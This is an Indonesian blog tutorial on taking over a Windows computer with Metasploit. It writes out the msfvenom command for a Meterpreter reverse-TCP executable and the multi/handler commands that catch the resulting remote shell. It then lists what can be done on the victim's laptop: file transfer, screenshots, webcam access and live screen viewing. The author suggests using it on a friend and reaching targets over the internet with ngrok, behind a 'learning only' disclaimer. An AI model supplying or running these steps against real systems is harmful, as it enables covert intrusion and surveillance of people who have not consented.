Mengeksploitasi Windows dengan Metasploit Framework

PERINGATAN Ini Hanya Untuk Pembelajaran jangan disalah gunakan dalam hal yang tidak baik baik...

Assalamu'alaikum Wr. Wb. Kembali Lagi Dengan Saya Galang Sutarna pada kesempatan kali ini saya akan memberikan sebuah tutorial yaitu mengenai Metasploit kali ini saya akan membahas cara Exploit Windows dengan Metasploit di Kali Linux Jadi Pesiapannya ialah

-Adanya Target/korban
-Adanya Payload
-Adanya Metasploit 

Untuk Korban disini Saya Menggunakan Virtualbox jika kalian Targetnya teman anda sendiri Juga Bisa hehe tidak masalah. mari Kita Mulai

Langkah Pertama Ialah Membuat Payload menggunakan Msfvenom dengan Input
msfvenom -p windows/meterpreter/reverse_tcp LHOST=(IP ADDRESS ANDA) LPORT=(YANG dinginkan) -f exe -o (path yang ingin ditentukan)
Langkah Kedua jalankan Metasploit dengan input msfconsole 
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST (yang sudah ditentukan di payload)
set LPORT (yang sudah ditentukan di payload)
exploit
Disini saya sudah menjalankan Payload di Laptop si Korban/Target 
Jika kita Input help disitu akan banyak pilihan opsi di sini kalian bisa upload file,download file,screenshot,webcam,streaming dll di laptop si korban melalui laptop anda hehe
Disini saya ingin melihat kegiatan si korban sedang melakukan apa dengan laptopnya bisa input run vnc 
Maka Ini Hasilnya
Ya sekian dari saya semoga bermanfaat nah untuk ulasan hari ini hanya untuk jaringan LAN apakah bisa jaringan WAN? jawabannya bisa tetapi menggunakan tambahan ngrok mungkin lain kali saya bahas ....,sekali lagi ini hanya untuk pembelajaran tidak untuk disalahgunakan dalam hal kejahatan.., saya tidak akan bertanggung jawab jika ini disalah gunakan dalam hal yang tidak baik hehe :D ini hanya untuk pembelajaran wassalamu'alaikum wr. wb.
Click here to Download